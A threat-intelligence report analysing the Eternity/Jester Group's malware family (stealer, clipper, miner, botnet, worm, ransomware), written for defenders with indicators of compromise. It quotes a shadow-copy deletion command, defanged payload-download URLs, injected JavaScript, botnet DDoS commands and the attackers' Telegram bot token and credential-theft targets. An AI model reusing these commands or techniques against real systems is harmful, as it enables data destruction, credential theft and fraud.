A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022

Page created by Clyde Harrington
 
CONTINUE READING
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP
   A new emerging Cyber Threat
            May 2022
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                   2
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                          DEFENCE BELONGS TO HUMANS….

                                                3
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

   Date         Activity           Author
   18/05/2022   Report delivery    Luigi Martire, Carmelo Ragusa

                                                                   4
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT
   Table of Content

   Table of Content ........................................................................................................................................................................ 5

   Introduction ................................................................................................................................................................................ 6

   Eternity/Jester Group................................................................................................................................................................. 7

   The Arsenal ............................................................................................................................................................................... 11

      Jester Stealer ......................................................................................................................................................................... 12

           Web Injection Module .................................................................................................................................................... 17

           Config Decryption ........................................................................................................................................................... 18

      Merlynn Clipper .................................................................................................................................................................... 20

           Config Decryption ........................................................................................................................................................... 23

      Trinity Miner ......................................................................................................................................................................... 24

      Lilith Botnet........................................................................................................................................................................... 26

           Config Decryption ........................................................................................................................................................... 31

   February 2022: the rebrand ................................................................................................................................................... 32

      Eternity Worm ...................................................................................................................................................................... 34

      Eternity Ransomware .......................................................................................................................................................... 39

   Conclusion ................................................................................................................................................................................ 43

   Appendix ................................................................................................................................................................................... 44

      Indicators of Compromise .................................................................................................................................................. 44

           Jester Stealer: .................................................................................................................................................................. 44

           Merlynn Clipper: ............................................................................................................................................................. 46

           Trinity Miner: ................................................................................................................................................................... 46

           Lilith Botnet: .................................................................................................................................................................... 46

           Eternity Ransomware: .................................................................................................................................................... 46

           Eternity Worm: ................................................................................................................................................................ 46

      Yara Rules ............................................................................................................................................................................. 47

                                                                                                                                                                                                5
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

   Introduction
   Every month new threats are developed and sold in the underground forums, and each of them can grow and
   become a severe risk to the security. Indeed, monitoring the darknet is fundamental for threat research and
   proactive defense.

   During our investigations, we at Yoroi Malware ZLab have found a new emerging cyber-criminal group with great
   potential to become an essential factor inside the cyber security threat landscape. This threat actor calls itself
   “Eternity Group,” previously “Jester Group”; we internally tracked it as “TH-320”.

   The group has been active at least from July/August 2021, when they developed and released the first malware,
   Jester Stealer, with an extensive sponsorship campaign inside the main underground forums. Then, the group's
   capabilities increased, also releasing other malicious software.

   For all these reasons, we decided to dig into these malicious operations and create a comprehensive whitepaper
   where we can share all the information about the threat actor.

                                                                                                                        6
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT
   Eternity/Jester Group
   During our investigation of this threat, it emerged that TH-320 had covered a large field of malware writing during
   the activity period. Their primary objective is to make money from selling and using malware. Therefore, we tried
   to summarize all the information classified the TTPs in the following flashcard and the history of the entire group in
   a comprehensive timeline:

                                   Figure 1: Eternity Group (aka, TH-320, Jester Group)

   The first activities date back to July/August 2021, when the group emerged on 16 different forums and started to
   publish information about their malicious products.

                                                                                                                         7
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                       Figure 2: Advertising panel of the Eternity Group inside the darknet forums

   The group writes both in English and Russian, so we believe they could have connections with the Russian
   environment. Furthermore, their activity isn’t limited to just the development of Malware but also selling private
   courses and manuals. That model is quite helpful for two reasons: the first one is the fast-making money, and the
   second one is that they can leverage the course materials to find other components for their group.

   An example of the interaction inside the telegram channel is the following:

                                         Figure 3: JesterGroup Course Advertising

                                                                                                                        8
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY                ANNUAL
   The first activity we found related to themREPORT
                                              was the selling of Jester Stealer which has been gaining rapid popularity.
       So, they grasped our attention and we decided to research and found several samples.

       In a second moment, we found other collateral malicious projects to enlarge their selling capabilities; these are the
       names:

           •     Jester Stealer
           •     Merlynn Clipper
           •     Trinity Miner
           •     Lilith Botnet

       Pivoting the information on the social networks and their public usernames, we collected at least three active
       members of the cyber-crime gang. Their nicknames are:

           •     LightM4n (aka L1ghtM4n)
           •     Voipdiprincipedibeler2 (aka PRINCIPEDIBELER, PRINCIPEDIBELER2)
           •     drkust0m

       Among the three identified members, LightM4n seems to be the main developer and has several projects on
       GitHub:

                                               Figure 4: L1ghtM4n’s GitHub Account

       One of the most complex jobs of our activity is to track the people behind the threat actor. In this paper, we were
       able to identify the principal operators and developers of the cyber gang with their roles inside it. The following
       scheme shows the members of Eternity Group and their products, where the part of “dr.kust0m” and
       “Voipdiprincipedibeler2” is to advertise them on many telegram channels.

                                                                                                                             9
A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                             Figure 5: Scheme of the members

   The last point to keep track of Eternity Group is to reconstruct the chronological timeline of its evolution. So, we
   tracked the first evidence of advertising inside many darknet forums, arriving at their latest products. The group
   gained popularity very quickly thanks to affiliated groups' advertising and can be proved by scammers who have
   tried to impersonate them. Now they have released a complete arsenal of malware for every type of need of a
   cyber-criminal. This is a clear sign we may expect many campaigns related to their products.

                                                                                                                          10
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                                    Figure 6: Timeline

   All the tools the cyber gang developed are targets of the following analysis and dissection. This operation helps
   keep track of the TTPs and the evolution of the cyber arsenal.

   The Arsenal
   The group is constantly developing new malicious code and new features belonging to a cyber arsenal, making
   them a complete malicious profit-making company. The following section, will provide some technical insights for
   each sample belonging to the gang.

                                                                                                                       11
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
   Jester Stealer ANNUAL REPORT
   The first malicious product developed by the threat actor is Jester Stealer. We have evidence that the first versions
   of the malware date back to July/August 2021. The following screen is the adverting panel of it:

                                      Figure 7: Jester Stealer capabilities advertising

    Hash                   6f7f22d44491f9768519ae4aafc93a543d37186a9ccd1e197e29014a48c13095

    Threat                 Jester Stealer

    Brief Description      .NET Stealer

    SSDEEP                 3072:uKmAqKt6JmD1KieL8U0Hpf/ReAS7s3LYLsz6dh2OGYD9KKRFxsbeKD5uYCC1Mrvs:uK
                           R68Zxe4buu3Wsz6dhLGmFSbvMKqO

   The malicious capabilities of the malware are the presence of a kill-switch, anti-analysis techniques and the
   creation of a mutex. The kill-switch works in this way: the bytes of salt_upload_data are taken and hashed with
   SHA256 to create a registry key in “HKEY_CURRENT_USER\SOFTWARE\{hash}\state” if the value of state equals 1,
   the sample will exit.

                                                                                                                      12
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                                     Figure 8: Killswitch

   After these checks, the sample executes the core function devoted to the stealing: a thread will be conducted for
   each category of the stolen data. Finally, the information is stored inside a .txt and then zipped. The peculiarity of
   this sample is that the archive and the files are created in memory.

                                         Figure 9: Routine devoted to the stealing

                                                                                                                        13
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY              ANNUAL
   Following is the complete                 REPORT
                             catalog of the stolen data:

       Category                         Stolen Information

       System                           Windows Password Vault, Windows Credentials Manager, List of available
                                        networks, Screenshot

       Gaming                           Steam, Twitch, OBS

       FTP                              FileZilla, WinSCP, CoreFTP, Snowflake

       VPN                              NordVPN, EarthVPN, WindScribeVPN

       Browsers                         Chrome, Firefox, 360Browser, 7Star, Amigo, Brave, Citrio, CentBrowser, Chedot,
                                        Chromodo, CocCoc, Comodo, Coowon, Elements, Epic, Iridium, K-Melon, Kometa, Atom,
                                        ChromePlus, Maxthon3, Edge, Nichrom, Opera, Orbitum, QIP Surf, Sputnik, Torch, Uran,
                                        Vivaldi, Yandex, Liebao, Uran, Chromium

       Messengers                       Telegram, Discord, Pidgin, Outlook, FoxMail, WhatsApp, Signal, RamBox

       Wallets (Address, Balance,       MoneroCore, BitcoinCore, DashcoinCore, DogecoinCore, LitecoinCore, Electrum, Exodus,
       Transactions)                    Atomic, Jaxx, Coinomi, ZCash, Guarda, Wasabi, MetaMask, TronLink, BinanceChain,
                                        Coin98, iWallet, Wombat, MEW CX, NeoLine, Terra Station, Keplr, Sollet, ICONex, KHC,
                                        TezBox, Byone, OneKey, DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite
                                        Client. ZilPay, Leaf Wallet, Cyano Wallet, Cyano Wallet Pro, Nabox Wallet, Polymesh
                                        Wallet, Nifty Wallet, Liquality Wallet, Math Wallet, Coinbase Wallet, Clover Wallet, Yoroi,
                                        EQUAL Wallet, BitApp Wallet, Auro Wallet, Saturn Wallet, Ronin Wallet

       Password Managers                BitWarden, KeePass, NordPass, 1Password, RoboForm, Dashlane, Keeper, LastPass,
                                        BrowserPass, MYKI, Splikity, CommonKey, Zoho Vault, Norton, Avira, Trezor,
                                        Authenticator, SSO Authenticator, EOS Authenticator

       Files Grabber

      Table 1: Jester Stealer targeted information

      Then, Jester Stealer proceeds to exfiltrate the stolen information. Once compressed the harvested information,
      The malware proceeds to send it to the C2. The exfiltration model provides a primary C2 inside the TOR network
      and uses the AnonFiles Hosting Services as a secondary solution.

                                                                                                                           14
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                               Figure 10: Exfiltration over TOR

   In detail, if the C2 is hidden behind the TOR Network, the sample will enable a proxy. This proxy is enabled by
   executing the tor command-line tool downloaded from the actor’s GitHub repository. Once the proxy has been
   enabled, the sample will send a POST request with the encrypted (AES) zip and a summary of the stolen
   information in the header. Otherwise, if the C2 is offline, the sample will upload a .zip using the API of anon files, in
   this case, the data contained in the .zip are not encrypted, and the name of the file will be the Username
   concatenated with the MachineName.

                                            Figure 11: Exfiltration over Anon Files

   System information is also included in the comment of the archive of all stolen ones:
                                                                                                                         15
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                       Figure 12: Archive comment

                                                    16
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY     ANNUAL REPORT
   Web Injection Module
   During the analysis, we noticed some exciting Javascript strings: the stealer uses the remote debugging utility of
   chrome to execute arbitrary Javascript code. The web inject can be very useful when the victims have no saved
   credentials and the targeted data aren’t available to harvest from a desktop application:

                                            Figure 13: Web Injection capability

   The following is a list of the targeted websites along with the stolen information:

                                                                                                                        17
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
    Target    ANNUAL REPORT                                       Content

    Title                                                         document.title

    Current URL                                                   window.location.href

    User Agent                                                    Navigator.userAgent

    Paypal                                                        Browser, Profile, Username, Password, Balance, Cards

    Steam                                                         Browser, Profile, Login, Email, Guard State, Balance,
                                                                  Inventory Items

    Facebook                                                      Browser, Profile, Access Token

    GitHub                                                        Id, Browser, Profile, Account Name, Subscribers,
                                                                  Repositories

    Youtube                                                       Id, Browser, Profile, Channel Name, Subscribers

    Wallets                                                       Balance, Addresses

    Credit Cards                                                  Country, Type, Holder

    Instagram                                                     Account Name, Browser, Profile, Subscribers

   Table 2: Targeted websites

   Config Decryption
   The encryption of the config is composed of BASE64 + AES (CBC - 128), so as the first step, the strings are decoded
   from BASE64, and then AES decrypted.

                                                                                                                     18
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                    Figure 14: Jester Stealer Config

   The config is made of:

    Field to decrypt                                 Decrypted configuration

    mutex

    key_upload_data                                  Key used to encrypt the files with AES during the
                                                     exfiltration

    salt_upload_data                                 String used as salt to hash the key with SHA256 (can
                                                     be used as campaign identifier)

    C2

    anonfiles_token                                  Used as backup if the C2 is offline, the token is part of
                                                     the anonfiles API

    check_key_verify                                 The hardcoded SHA256 of key_upload_data, is used to
                                                     verify if the hash is the same

   Table 3: Jester Stealer config

                                                                                                                 19
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY   ANNUAL REPORT
   Merlynn Clipper
   Merlynn Clipper doesn’t differentiate itself from the usual .NET Clipper, and its strong point is the constant updates
   and the many supported cryptocurrencies.

                                              Figure 15: Merlynn Clipper Advertising

    Hash                  f948fc3a5970cc6bc0b8b767ec89864daa2542eb09b32a9c952070c8d9ec3e99

    Threat                Merlynn Clipper

    Brief description     .NET Clipper

    SSDEEP                192:oC1NpyPG0AdGyQZpmzWRdIoOrESLnvD/4L8oCXrsujzJoHY568Fs2TvZ/cV4IMJw:oeasdGhioOr5
                          nvD/rPjz+45Nvnye

   Merlynn replaces a cryptocurrency address in the clipboard with the one specified in the config, editable inside a
   builder:

                                                                                                                        20
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                            Figure 16: Merlynn Clipper Builder

   In the primary method, the sample calls the function Install to achieve the persistence by copying itself into the
   Startup directory. Once done, uses AddClipboardFormatListener and WndProc to monitor a change in the victim's
   clipboard.

                                             Figure 17: Merlynn Clipper Main

                                                                                                                        21
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY            ANNUALwhich
   Inside the method, “ModifyClipboard,” REPORT
                                           is the core of the sample, the clipper will replace the address and
      send some logs to a Telegram Bot.

                                          Figure 18: Merlynn Clipper Core Routine

      These are the currently supported cryptocurrencies:

                                   Figure 19: Merlynn Clipper supported cryptocurrencies
                                                                                                                 22
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY     ANNUAL REPORT
   Config Decryption
   The addresses and Telegram Tokens in the config are AES Encrypted. Therefore, the Key can be easily found in the
   same class.

                                      Figure 20: MerlynnClipper Config decryption

   In the analyzed sample, we found the following wallets:

          Field to decrypt                                   Decrypted configuration

    xmr                      D47hVqg4ztcXE8dBe8JP6Q4KGu6FosHMUZNxkqi2EVXuCcfwkhKjrfxvL8E2X5vy4Mb8
                             KihxnMEsoDXP8fV647yeARRhsv5C

    btc                      1MnCfFdcyrMFcnXJPr4WN5nzTz1ssNcGp7

    eth                      0x3e1769F695e9cc77349Ee7fD5D832Cdad272E477

    doge                     DEc5jVH4mtEhnXNJADiV7Up1K6RuWWoL1Y

    ltc                      LdYqPNQyHT41aFjiUTbq1AzrQSJVWfwD4y

    xrp                      rNCs8WjvZj2TQ2REEWF6EHyQQqs1GQHkZS

    dash                     XouJhwrxkS5W3y9o8zyFuc1f1uUr25MUEq

    TelegramChatId           1504112609

                                                                                                                 23
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
    TelegramBotToken ANNUAL       REPORT
                      2097658010:AAFGimMzIL1tvl8SnDSJIEJ14d2Ffc7KtZw

      Mutex                      08ab2ccb-64df-4ec9-97a0-9c3f8eb282cc

     Table 4: Merlynn Clipper config

     Trinity Miner
     Trinity Miner doesn’t limit itself to just the execution of XMRig, but tries to be as much as possible stealthier
     compared to other miners.

                                                 Figure 21: Trinity Miner Advertising

      Hash                       4ec2be2e2e2bc0dfdc9b8c741fbfab0432f045716d27c3b27ac16fad4cb47dab

      Threat                     Trinity Miner

      Brief description          .NET Xmrig dropper

      SSDEEP                     49152:qzuzgsK8XCwKyblc81KsH7FtfcaSPL/e6988MKMTq3xJTaUbEyit:zzgEywKybm
                                 81KQ7F9caSPi69893Oj81t

     The primary method is responsible for creating the mutex with a hardcoded string, the setup of the persistence in
     the Startup folder and the execution of XMRig, which is contained in the sample’s resources and compressed.

                                                                                                                         24
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                          Figure 22: Trinity Miner Main method

   Then, the sample checks if XMRig is already executed via WMI. Then, inside the Start function, the arguments are
   formatted, and XMRig will be injected using the process hollowing technique.

                                    Figure 23: Evidence of Process Hollowing API calls

   When the program is running the Explorer, the behavior of the process injection looks like the following:

                                                                                                                      25
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                 Figure 24: Trinity Miner Process Injection into explorer.exe

   Lilith Botnet
   Lilith Botnet it’s the “all in one” solution provided by the Eternity Group. It has the classic botnet functions plus
   Jester Stealer, Merlynn Clipper and Trinity Miner capabilities.

                                              Figure 25: Lilith Botnet Advertising

    Hash                   150d348ba6d84cd7095f78719e83c7a8ab1445f0d68ae5886f4e731b5aa5882e

    Threat                 Lilith Botnet

    Brief description      .NET Botnet with Stealer and Miner modules

    SSDEEP                 3072:4GzAFH91sQf3ws/PYNnJDZwuK4I+4zgG+mgzWHz+T/qF+bLr5jEt1IZFMCC0gvRs:4Gz/
                           nPPS+mgzMqSF+bLJEt1ku/

                                                                                                                           26
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
   Once the sample starts, ANNUAL          REPORT
                           three checking methods are executed, the first is a license validation, the second is an anti-
       VM where the following WMI “SELECT * FROM Win32_PortConnector” is queried the last one checks for the
       presence of some modules related to virtualization programs or antivirus products:

           •    SbieDll
           •    SxIn
           •    Sf2
           •    snxhk
           •    Cmdvrt32

       The sample will then create a Mutex and copy itself to the startup folder.

       When the preliminary routines are executed, Lilith Botnet will register the victim, sending the first information to
       the C2. Then, depending on the location of the C2 inside the TOR Network, the sample will enable the proxy using
       the same function seen in Jester Stealer.

                                            Figure 26: LilithBot sending victim’s information

       The response will be decrypted (AES). If it contains the string “registered successfully,” the sample can also update
       a field of the config “commandCheckInterval” used in the Sleep inside the function used to determine if the C2 is
       offline or if the Victim’s Network is offline.

                                                                                                                              27
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                            Figure 27: Checking network status

   The value of “parameters” in this case is the command “getCommands”, if the command is successfully retrieved,
   the sample will start a thread of the core function.

                                                                                                                28
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                    Figure 28: LilithBot preparing to receive commands

   This is the list of all the available commands:

    Command                                Description

    Lilith:ServerOffline                   The C2 is offline

    Lilith:NetworkOffline                  The victim’s Network is offliine

    Lilith:EncKeyFailed                    AES Decryption failed

    DDOS:HttpGET                           GET Requests to a specific target, using the following format:
                                           target?= 

    Advertising:YouTube_ViewVideo          The sample uses the same WebInjection methods of Jester Stealer,
                                           simply a new tab from the passed video url is created

    Lilith:UpdateConfiguration             N/A

                                                                                                              29
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
    DDOS:TCPFlood ANNUALTCPREPORT
                            Flood with a random buffer of length between 600-2300

      DDOS:UDPFlood                    UDPFlood with a random buffer of length between 60-400

      Advertising:YouTube_Subscribe    New tab of the given channel url, injection of the following Javascript
                                       “document.querySelector(\"#subscribe-button > ytd-subscribe-button-
                                       renderer > tp-yt-paper-button > yt-formatted-string\").click();”

      Lilith:UpdateClient              Update of the client

      Dropper:DownloadExecute          Downloads and execute a given payload, based on the arguments passed
                                       you can choose to bypass the UAC and execute as admin

      Lilith:DeleteClient              Deletes all the created artifacts except extra payloads downloaded with
                                       “Dropper:DownloadExecute”

      Advertising:YouTube_Dislike      New tab of the given video url, injection of the following Javascript:

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(1) > a\").click();",

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(2) > a\").click();"

      NetDiscover:ScanNetwork          Uploads to the C2 as “Network.txt”: IP, MAC, Vendor, Hostname, Ports

      Miner:StopMiner                  Stops the miner process

      DDOS:StopAttacks                 Stops a running DDOS method

      Dropper:ExecuteScript            Executes a given script as BAT or Powershell

      Advertising:YouTube_ViewStream   New tab of a given stream url

      Stealer:RecoverCredentials       Jester Stealer methods

      Advertising:YouTube_Like         New tab of the given video url, injection of the following Javascript:

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(2) > a\").click();",

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(1) > a\").click();"

      DDOS:HttpPOST                    POST Request Flood with a random buffer of length between 90-400

                                                                                                                 30
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
    Miner:StartMiner ANNUALTrinity
                              REPORT
                                   Miner methods

      Lilith:ExitClient                     Stops threads, browser, miner and terminate itself

     Table 5: Lilith Botnet commands

     Config Decryption
     Like the others, the config is encrypted with AES, as you can see from the following figure:

                                                Figure 29: Lilith Botnet Config

      Field to decrypt       Decrypted configuration

      clientId               GUID

      hostname               hxxp://31.44.5.14:4545/gate/{0}/{1}

      encKey                 c4d8c7f433c1e79afe4eff3a4b05c7c9

      owner                  admin

      license                0FD5E4066478E3DD29AB263903CBA0F3

     Table 6: Lilith Botnet Config

                                                                                                    31
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT
   February 2022: the rebrand
   On February 1st, a message from Jester Group announces a complete rebrand of the group due to the many
   reports of scammers, claiming it will not be a simple rebrand but will include a new name, new projects and more.

                                    Figure 30: Jester Group announcing the rebrand

   The new group officially operates since 02/02/2022 under the name of “Eternity” and started publishing new
   Malware; a worm, ransomware and RAT, respectively called “EternityWorm,” “EternityRansomware,” and
   “EternityRAT.” On April 10th, they claimed that more than 300 users were registered in the Telegram Bot (used as a
   builder for all the projects).

                                                                                                                   32
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                Figure 31: Eternity Group showing the registered users

   The homepage of the group revealed that they have six available Malware to purchase:

                                       Figure 32: Eternity Group official website

                                                                                          33
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
   Some of them were the ANNUAL        REPORT
                         previous commented, and now we focus on the new malware codes developed after the
      rebranding operation.

      Eternity Worm
      Eternity Worm is the first Malware developed after the rebrand

                                               Figure 33: Eternity Worm advertising

      Once executed, the worm performs a mutex check, creating it from a hardcoded string, which in this case is
      “hnvkwqubmk”, then proceeds to copy itself to “%appdata%\Local\ServiceHub” and set up a scheduled task, if
      administrator with priority to highest, if not to limited, then deletes itself in the old location and execute again from
      the new site.

                                                                                                                            34
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                           Figure 34: Setting up the persistence

   The sample now retrieves two payloads:

       •   The first one comes from “hxxp://c.vinhall169.]com/w.exe”, which is the worm itself.
       •   The second is Eternity Clipper hxxp://c.tronlink.]golf/sa/c.exe.
       •

                                            Figure 35: Downloading payloads

                                                                                                  35
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY            ANNUAL
   While downloading the payloads         REPORT
                                  and setting up the persistence, the sample creates a list of threads. The worm
       adds the core routines of its features inside that list. One of these malicious features is to create discord spam,
       which starts by checking if the string “Look at this. Very good stuff.[URL]” isn’t equal to “0”, then it proceeds to get
       the username and iterates the channels of the victim. The username is retrieved by making a GET request to
       “hxxps://discord.]com/api/users/@me”, returning a JSON and then retrieving the value from the field “username#”
       + value of the field “discriminator”, the channels are retrieved with a request to
       “hxxps://discord.]com/api/users/@me/channels” and iterates it to get the IDs:

                                                 Figure 36: Setting up discord spam

       The worm now iterates the list of IDs, and for each one calls the method “SendMessage”, the message is sent by
       making a POST request to “hxxps://discord.]com/api/v9/channels/{0}/messages”, which is formatted with the ID
       and the content of the message which is: “Look at this. Very good stuff.[URL]” with [URL] being replaced by the
       payload.

                                                 Figure 37: Sending spam messages

                                                                                                                                  36
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY               ANNUAL
   The following routine is for              REPORT
                                the spam on Telegram. After retrieving the private keys, the sample downloads a
       payload from “hxxp://iqox575zftwvbkphhnbdxkg6pfrgcmeos3rebjwdt6ra2r73u5iq2jqd.]onion/shared/worm.exe”
       which unfortunately we were unable to get, this payload is executed then with the key as an argument.

       An exciting feature of this worm is the capability to infect the Python interpreter. It starts by iterating the directory
       “%appdata%\Local\Programs\Python” for each Python version it gets the file “Lib\os.py” and passes it as an
       argument to the method “Execute,” which consists of the parameters “targetFile” the os.py file, “url” the payload
       and “at_start” a boolean value which indicates if the payload is going to be written at the start of the file or not.

                                                      Figure 38: Infecting “os.py”

       The url is passed to the method “PreparePayload” which writes the following Python code:

                                                   Figure 42: Payload inside os.py

                                                                                                                               37
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY             ANNUAL
   The Base64 string contains              REPORT
                              the code which you can see immediately under it: there are a couple of “try” and
       “except” statements aimed at downloading the payload from the URL “hxxp://c.vinhall169.com/w.]exe” in the
       temporary path to execute it.

       The latest methods are for the infection of USB Drives, Local Files and the Cloud.

       For the local files, the sample iterates these directories:

           •    Desktop
           •    MyPictures
           •    Documents

       For the Cloud:

           •    DropBox
           •    Google Drive
           •    OneDrive

       The files with an extension .py or .pyw will be infected using the same technique for the interpreter.

       Regarding the files with the following extensions: “.zip, .exe, .jar, .pdf, .docx, .xlsx, .pptx, .mp3, .mp4, .png”, the files
       are replaced with a sample contained in the resources of “DarkBuilder.dll”, a recurrent library written by L1ghtM4n
       which helps while writing malicious code, present in several malicious artifacts. This resource is called “JoinerStub”
       the worm takes the original file and writes two resources; “” and “k,” the first contains
       the file, and the second contains 32 random bytes used to XOR the file, the same process applies to the payload.

                                                       Figure 39: Binding method

       The “JoinerStub” works in the following way: it iterates the resources, decrypt them, writes the decrypted sample in
       the “%temp%” directory and if the sample extension is contained in this list

                                                                                                                                  38
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY                  ANNUAL
   “.exe, .com, .scr, .pif, .bat,                    REPORT
                                  .cmd, .vbs, .js, .py, .jar” the sample sleeps for 1 second and then executes it. Eternity
       Worm also spoofs the extension using the technique RTLO (Right-to-Left Override).

       Eternity Ransomware
       Eternity Ransomware is the latest Malware developed. It uses AES+RSA, and it is simple but has some interesting
       features.

                                                   Figure 40: Eternity Ransomware

       Once executed, it checks if the arguments passed, and if none proceeds to create a mutex from a hardcoded
       string, which is the following “rbziwoehbr” instead of “--debug” it’s passed, the mutex will not be created.

                                                      Figure 41: Mutex Creation

       Once the mutex has been created, the sample tries to avoid possible detection of its activities by disabling/killing
       specific tools, such as the Task Manager, by modifying the following registry key:
       “Software\Microsoft\Windows\CurrentVersion\Policies\System\ DisableTaskMgr”, and by starting a thread to kill
       processes containing these strings in the name: “taskmgr, processHacker, procmon, procmon64, mmc”.

                                                                                                                              39
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                   Figure 42: Eternity Ransomware defensive capabilities

   The Ransomware proceeds inhibiting system recovery by iterating restore points and removing them using
   SRRemoveRestorePoint, it also deletes shadows copies executing “vssadmin delete shadows /all /quiet”

                                 Figure 43: Eternity Ransomware avoiding system recovery

   Then, it adds the following registry key “HKCU\Software\Classes\.ecrp\shell\open\command” to execute when the
   victim tries to open an encrypted file.

                                                                                                               40
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

                                        Figure 44: Adding the extension in the registry

   Once the preliminary routines are executed, the sample calls the method “GetFiles” to iterates the following
   directories:

       •    C:\Users\Admin\Pictures
       •    C:\Users\Admin\Documents
       •    C:\Users\Admin\Desktop
       •    C:\Users\Admin\AppData\Roaming\DropBox
       •    C:\Users\Admin\AppData\Roaming\OneDrive

   For each file, it calls the method “EncryptFile,” which performs these malicious operations:

       1.   Check whether the file exists, and its extension isn’t equal to the one used by the Ransomware,
       2.   Generate a random AES key by using the RNGCryptoServiceProvider
       3.   Protect just generated AES key with the RSA Public Key set earlier in the .cctor

    oXmacSoncuYi5Occov7K5P3m3IeOWpTMlE4hBUP/C8GswV4b+V7rh8dz3cJ6g+CTqrMy0letdgDMGRtTtimlL+wx5Lkfp3P
    sdlO7ka/Jby+nKIOrSv69WitdqsbMhy1YMQT0HxbUSQIMl/p+oX9lXYb5B0vvz7amErnR8ts7J0ap9mPQHfjJ9YJBeskFty4kOiEFlt0NoqdMjdXLDTPiYhY/q
    miOLmRx12C87TWhlmN0EyBJ7YBVFpMUfRbSK4H8DhHt9ZNh3W94uK//m6DaGtEoavw4QQ6qDOOlh4JGK2wuiwhFTNz+ihZQwQN601P1IIZAgF2lP
    eixNVX6KarD0Q==AQAB

   Code Snippet: Hardcoded Public key

       4.   Save the protected AES key in the registry key “HKCU\Software\Chrome\EncryptedKeys”

                                        Figure 45: Encrypted AES Keys in the registry

                                                                                                                            41
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT
   The aggressed files to encrypt are encrypted with the AES algorithm, then compressed with Deflate and converted
   to XML. The XML file contains two fields; “” including the ID of the key saved in the registry, and “,”
   containing the body of the encrypted file.

   The following picture describes the encryption routine:

                                   Figure 46: Eternity Ransomware encryption process

                                                                                                                          42
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY ANNUAL REPORT

   Conclusion
   The actor is growing fast: in a few months, it was able to develop a large quantity of malicious code with a high
   technical level. This paper analyzed six components representing all the modern malware threats, starting from
   info-stealers, arriving at Ransomware and Worms, and passing for miners and clippers.

   During the samples’ hunting, we also found many packed samples, indicating that the gang has contacts with other
   criminal gangs to enhance the complexity of analysis and limit the AV detection.

   We won’t be surprised if we encounter that actor adopting the double extorsion malicious business model one
   day.

   Threat Hunting and Threat Intelligence capabilities play a fundamental role in cyber defense activities. Indeed,
   having a detailed overview of a new threat actor helps the protection inside Yoroi’s Cyber Security Defense Center
   and all the possible victims of similar attempts of attack.

